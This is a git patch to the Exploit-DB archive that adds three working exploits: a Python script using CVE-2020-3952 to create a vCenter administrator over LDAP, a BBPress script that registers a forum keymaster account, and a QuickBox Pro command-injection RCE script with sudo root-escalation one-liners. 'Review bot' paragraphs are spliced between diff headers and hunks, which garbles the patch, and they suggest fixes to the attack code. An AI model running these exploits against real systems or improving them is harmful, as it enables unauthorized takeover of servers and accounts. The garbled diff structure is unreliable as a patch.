From b68cd4f38a9dbf2fb16c4398150a0503521fa697 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 2 Jun 2020 05:01:56 +0000
Subject: [PATCH] DB: 2020-06-02 3 changes to exploits/shellcodes
Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
VMware vCenter Server 6.7 - Authentication Bypass
QuickBox Pro 2.1.8 - Authenticated Remote Code Execution
---
 exploits/multiple/webapps/48535.txt | 248 ++++++++++++++++++++++++++++
 exploits/php/webapps/48534.py | 58 +++++++
 exploits/php/webapps/48536.py | 53 ++++++
 files_exploits.csv | 3 +
 4 files changed, 362 insertions(+)
 create mode 100644 exploits/multiple/webapps/48535.txt
 create mode 100755 exploits/php/webapps/48534.py
 create mode 100755 exploits/php/webapps/48536.py
diff --git a/exploits/multiple/webapps/48535.txt b/exploits/multiple/webapps/48535.txt
new file mode 100644
index 000000000..b15ea1f20
--- /dev/null
+++ b/exploits/multiple/webapps/48535.txt
@@ -0,0 +1,248 @@ +# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass +# Date: 2020-06-01 +# Exploit Author: Photubias +# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html +# Version: vCenter Server 6.7 before update 3f +# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) +# CVE: CVE-2020-3952 + +#!/usr/bin/env python3 + +''' + Copyright 2020 Photubias(c) + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + + Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 + + File name CVE-2020-3592.py + written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be + + ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x + + This is a native implementation without requirements, written in Python 3. 
+ Works equally well on Windows as Linux (as MacOS, probably ;-) + + Features: exploit + vulnerability checker +''' + +import binascii, socket, sys, string, random + +## Default vars; change at will +_sIP = '192.168.50.35' +_iPORT = 389 +_iTIMEOUT = 5 + +def randomString(iStringLength=8): + #sLetters = string.ascii_lowercase + sLetters = string.ascii_letters + return ''.join(random.choice(sLetters) for i in range(iStringLength)) + +def getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified + ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed + sReturn = sPrefix + if (len(sData) / 2 ) > 255: + sReturn += b'82' + hexBytes = 2 + elif (len(sData) /2 ) >= 128: + sReturn += b'81' + sReturn += f"{int(len(sData)/2):#0{(hexBytes*2)+2}x}"[2:].encode() + return sReturn + +def buildBindRequestPacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + ## Packet Construction + sPacket = getLengthPrefix(sPass, b'80') + sPass + sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket + sPacket = b'020103' + sPacket + sPacket = getLengthPrefix(sPacket, b'60') + sPacket + sPacket = b'020101' + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildUserCreatePacket(sUser, sPass): + sUser = binascii.hexlify(sUser.encode()) + sPass = binascii.hexlify(sPass.encode()) + def createAttribute(sName, sValue): + sValue = getLengthPrefix(sValue, b'04') + sValue + sName = getLengthPrefix(sName, b'04') + sName + + sReturn = getLengthPrefix(sValue, b'31') + sValue + sReturn = sName + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + def createObjectClass(): + sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') + sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') + sReturn += 
getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') + sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') + + sReturn = getLengthPrefix(sReturn, b'31') + sReturn + sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn + sReturn = getLengthPrefix(sReturn, b'30') + sReturn + return sReturn + + ## Attributes + sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) + sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) + sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) + sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) + sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) + sAttributes += createObjectClass() + sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) + ## CN + sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') + sUserEntry = getLengthPrefix(sCN, b'04') + sCN + + ## Packet Assembly (bottom up) + sPacket = getLengthPrefix(sAttributes, b'30') + sAttributes + sPacket = sUserEntry + sPacket + sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def buildModifyUserPacket(sUser): + sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) + sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') + sMember = binascii.hexlify(b'member') + ## Packet Construction + sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN + sPacket = getLengthPrefix(sPacket, b'31') + sPacket + 
sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket + sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket + sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket + sPacket = getLengthPrefix(sPacket, b'30') + sPacket + #print(sPacket) + return binascii.unhexlify(sPacket) + +def performBind(s): + ## Trying to bind, fails, but necessary (even fails when using correct credentials) + dPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') + s.send(dPacket) + sResponse = s.recv(1024) + try: + sResponse = sResponse.split(b'\x04\x00')[0][-1:] + sCode = binascii.hexlify(sResponse).decode() + if sCode == '31': print('[+] Ok, service reachable, continuing') + else: print('[-] Something went wrong') + except: + pass + return sCode + +def performUserAdd(s, sUser, sPass): + dPacket = buildUserCreatePacket(sUser,sPass) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + print('[+] Success! 
User ' + sUser + '@vsphere.local added with password ' + sPass) + elif sCode == b'\x32': + print('[-] Error, this host is not vulnerable (insufficientAccessRights)') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + print('[-] Error, user not added, message received: ' + sMessage) + except: + pass + return sCode + + +def performUserMod(s, sUser, verbose = True): + dPacket = buildModifyUserPacket(sUser) + s.send(dPacket) + sResponse = s.recv(1024) + try: + sCode = sResponse.split(b'\x04\x00')[0][-1:] + sMessage = sResponse.split(b'\x04\x00')[1] + if sCode == b'\x00': + if verbose: print('[+] User modification success (if the above is OK).') + else: + if sMessage[2] == b'81': sMessage = sMessage[3:].decode() + else: sMessage = sMessage[2:].decode() + if verbose: print('[-] Error during modification, message received: ' + sMessage) + except: + pass + return sCode, sMessage + +def performUnbind(s): + try: s.send(b'\x30\x05\x02\x01\x04\x42\x00') + except: pass + +def main(): + global _sIP, _iPORT, _iTIMEOUT + _sUSER = 'user_' + randomString(6) + _sPASS = randomString(8) + '_2020' + bAdduser = False + if len(sys.argv) == 1: + print('[!] No arguments found: python3 CVE-2020-3592.py [] []') + print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) + print(' Leave username & password empty for a vulnerability check') + print(' Watch out for vCenter/LDAP password requirements, leave empty for random password') + print(' But for now, I will ask questions') + sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') + if not sAnswer == '': _sIP = sAnswer + sAnswer = input('[?] Want to perform a check only? [Y/n]: ') + if sAnswer.lower() == 'n': bAdduser = True + if bAdduser: + sAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') + if not sAnswer == '': _sUSER = sAnswer + sAnswer = input('[?] 
Please enter the new password for this user [' + _sPASS + ']: ') + if not sAnswer == '': _sPASS = sAnswer + else: + _sIP = sys.argv[1] + if len(sys.argv) >= 3: + _sUSER = sys.argv[2] + bAdduser = True + if len(sys.argv) >= 4: _sPASS = sys.argv[3] + + ## MAIN + print('') + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(_iTIMEOUT) + try: + s.connect((_sIP,_iPORT)) + except: + print('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') + sys.exit(1) + + performBind(s) + + if bAdduser: + sCode = performUserAdd(s, _sUSER, _sPASS) + + if not bAdduser: + print('[!] Checking vulnerability') + sCode, sMessage = performUserMod(s, 'Administrator', False) + if sCode == b'\x32': print('[-] This host is not vulnerable, message: ' + sMessage) + else: print('[+] This host is vulnerable!') + else: + sCode = performUserMod(s, _sUSER) + + performUnbind(s) + + s.close() + + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/php/webapps/48534.py b/exploits/php/webapps/48534.py new file mode 100755 index 000000000..c7bf7b794 --- /dev/null +++ b/exploits/php/webapps/48534.py 
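Review bot: In `performBind`, `performUserAdd` and `performUserMod` the bare `except: pass` leaves `sCode` (and `sMessage`) unassigned whenever the `split(b'\x04\x00')` slicing fails on an unexpected or truncated `recv` result, so the `return` that follows raises `UnboundLocalError` instead of reporting the malformed response; initialise both names before the `try` and narrow the handler to `except (IndexError, UnicodeDecodeError) as e:` with a printed diagnostic. In `performUserAdd` and `performUserMod`, `sMessage[2] == b'81'` compares an `int` (indexing `bytes`) with a `bytes` literal, so it is always false and the `[3:]` branch is dead; if the BER long-form length byte is meant, compare against `0x81`. The "check only" path in `main` is not read-only: `performUserMod(s, 'Administrator', False)` still sends an LDAP ModifyRequest, which the module docstring's "vulnerability checker" wording should state so that operators know the check is a write that shows up in the directory's audit log. The `#!/usr/bin/env python3` line sits below the header comments here and in `48536.py`, where it is not honoured as a shebang; move it to line 1 or drop it.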
@@ -0,0 +1,58 @@ +# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation +# Date: 2020-05-29 +# Exploit Author: Raphael Karger +# Software Link: https://codex.bbpress.org/releases/ +# Version: BBPress < 2.5 +# CVE: CVE-2020-13693 + +import argparse +import requests +import bs4 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +useragent = {"User-Agent" : "This is a real browser i swear"} + +def grab_nonce_login_page(url): + try: + login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent) + soup = bs4.BeautifulSoup(login_page_request.text, "lxml") + action = soup.find("form", class_="bbp-login-form") + wp_login_page = action.get("action") + wp_nonce = action.find("input", id="_wpnonce").get("value") + return (wp_nonce, wp_login_page) + except Exception as nonce_error: + print("[-] Nonce Error: '{}'".format(nonce_error)) + return False + +def exploit(url, username, password, email): + info = grab_nonce_login_page(url) + if info: + nonce = info[0] + login_page = info[1] + try: + return requests.post(login_page, data={ + "user_login" : username, + "user_pass" : password, + "user_email" : email, + "user-submit" : "", + "user-cookie" : "1", + "_wpnonce" : nonce, + "bbp-forums-role" : "bbp_keymaster" + }, allow_redirects=False, verify=False, timeout=10, headers=useragent) + except Exception as e: + print("[-] Error Making Signup Post Request: '{}'".format(e)) + return False + +if __name__ == "__main__": + exit("asdasd") + parser = argparse.ArgumentParser() + parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks") + parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123") + parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com") + parser.add_argument("-u", "--url", dest="url", help="URL 
of Page With Exposed Register Page.", required=True)
+ args = parser.parse_args()
+ site_exploit = exploit(args.url, args.username, args.password, args.email)
+ if site_exploit and site_exploit.status_code == 302:
+ exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password))
+ print("[-] Exploit Failed")
\ No newline at end of file
diff --git a/exploits/php/webapps/48536.py b/exploits/php/webapps/48536.py
new file mode 100755
index 000000000..9570332e2
--- /dev/null
+++ b/exploits/php/webapps/48536.py
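Review bot: `exploit` has inconsistent failure values: `grab_nonce_login_page` returns `False`, the `requests.post` handler returns `False`, but when `info` is falsy the function falls off the end and returns `None`, so the caller's `if site_exploit and ...` works only by accident and cannot tell which step failed; add an explicit `return False` after the `if info:` block. Both `except Exception` handlers are broader than needed — in `grab_nonce_login_page` a page without a `bbp-login-form` makes `action` `None` and the resulting `AttributeError` is reported as a "Nonce Error", indistinguishable from a network failure; catch `requests.RequestException` separately and check `action is None` explicitly. `exit(...)` in the `__main__` block is the `site` module helper rather than a language builtin; use `sys.exit(...)` so the script behaves the same under every interpreter configuration.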
@@ -0,0 +1,53 @@ +# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution +# Date: 2020-05-26 +# Exploit Author: s1gh +# Vendor Homepage: https://quickbox.io/ +# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/ +# Version: <= 2.1.8 +# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules. +# Tested on: Debian 9 +# CVE: CVE-2020-13448 +# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE + +''' +Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways. +1. sudo mysql -e '\! /bin/sh' +2. sudo mount -o bind /bin/sh /bin/mount;sudo mount + +''' + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import requests +import argparse +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from urllib.parse import quote_plus + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def exploit(args): + s = requests.Session() + print('[*] Sending our payload...') + + s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False) + try: + s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False) + except requests.exceptions.ReadTimeout: + pass + +def main(): + parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8") + parser.add_argument('-i',dest='ip',required=True,help="Target IP Address") + parser.add_argument('-u',dest='username',required=True,help="Username") + parser.add_argument('-p',dest='password',required=True,help="Password") + parser.add_argument('-c',dest='cmd', required=True, help="Command to execute") + args = parser.parse_args() + + exploit(args) + + +if __name__ == '__main__': + 
main()
+ sys.exit(0)
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f0b4b6136..1d33ec6a1 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42761,3 +42761,6 @@ id,file,description,date,author,type,platform,port
 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php,
 48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php,
 48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple,
+48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php,
+48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple,
+48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php,
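Review bot: In `exploit`, `s.get(...)` is issued without a `timeout`, so the `except requests.exceptions.ReadTimeout: pass` around it can never trigger and the call blocks for as long as the server keeps the connection open; pass an explicit `timeout=<SECONDS>` (placeholder — the script defines no value) or remove the dead handler. `main` calls `exploit(args)` and then `sys.exit(0)` unconditionally, so the process exit status is always success even when the session or request failed; have `exploit` return a status and pass it to `sys.exit`. `from requests.packages.urllib3.exceptions import InsecureRequestWarning` goes through a compatibility alias; importing `urllib3` directly, as `48534.py` does, is the conventional form.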